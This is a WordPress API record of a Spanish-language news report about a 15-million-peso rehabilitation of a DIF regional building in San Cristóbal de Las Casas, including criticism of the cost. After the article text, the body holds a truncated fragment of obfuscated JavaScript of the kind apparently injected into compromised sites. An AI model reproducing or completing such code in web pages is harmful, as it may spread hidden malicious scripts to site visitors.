{"id":16799,"date":"2024-07-19T04:09:20","date_gmt":"2024-07-19T04:09:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16799"},"modified":"2024-07-19T04:09:21","modified_gmt":"2024-07-19T04:09:21","slug":"inauguran-trabajos-de-rehabilitacion-del-edificio-del-dif-regional-zona-altos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16799","title":{"rendered":"Inauguran Trabajos de Rehabilitaci\u00f3n del Edificio del DIF Regional Zona Altos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240718-WA0045-1024x566.jpg\" alt=\"\" class=\"wp-image-16800\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240718-WA0045-1024x566.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240718-WA0045-300x166.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240718-WA0045-768x425.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240718-WA0045.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>18 de julio del 2024. San Crist\u00f3bal de Las Casas.- Se llev\u00f3 a cabo la inauguraci\u00f3n de los trabajos de rehabilitaci\u00f3n del edificio del DIF Regional Zona Altos. La secretaria de Obras P\u00fablicas del Estado, Claudia Baca Esquinca, destac\u00f3 la importancia de esta obra durante la ceremonia, que cont\u00f3 con la presencia del gobernador Rutilio Escand\u00f3n Cadenas.<\/p>\n\n\n\n<p>En su discurso, Baca Esquinca mencion\u00f3 que la rehabilitaci\u00f3n del edificio tuvo una inversi\u00f3n de 15 millones de pesos. Esta cifra ha generado asombro entre profesionales de la construcci\u00f3n debido a su elevado costo. Entre los sorprendidos se encuentra Jorge Alberto Ruiz Cacho, ex delegado del Instituto Nacional de Antropolog\u00eda e Historia (INAH).<\/p>\n\n\n\n<p>La rehabilitaci\u00f3n del edificio del DIF Regional Zona Altos es una obra significativa para la comunidad, pues mejorar\u00e1 las instalaciones y servicios ofrecidos a la poblaci\u00f3n. La secretaria de Obras P\u00fablicas subray\u00f3 que, a pesar de las cr\u00edticas por el costo, la inversi\u00f3n era necesaria para asegurar la calidad y durabilidad de la infraestructura.<\/p>\n\n\n\n<p>Por su parte, el gobernador Rutilio Escand\u00f3n Cadenas expres\u00f3 su satisfacci\u00f3n por la culminaci\u00f3n de estos trabajos, destacando el compromiso de su administraci\u00f3n con el bienestar de los ciudadanos y la mejora de los servicios p\u00fablicos en la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 18 de julio del 2024. San Crist\u00f3bal de Las Casas.- Se llev\u00f3 a cabo la inauguraci\u00f3n de los trabajos de rehabilitaci\u00f3n del edificio del DIF Regional Zona Altos. La secretaria de Obras P\u00fablicas del Estado, Claudia Baca Esquinca, destac\u00f3 la importancia de esta obra durante la ceremonia, que cont\u00f3 con la presencia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16800,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16799","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16799"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16799\/revisions"}],"predecessor-version":[{"id":16801,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16799\/revisions\/16801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16800"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16799"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}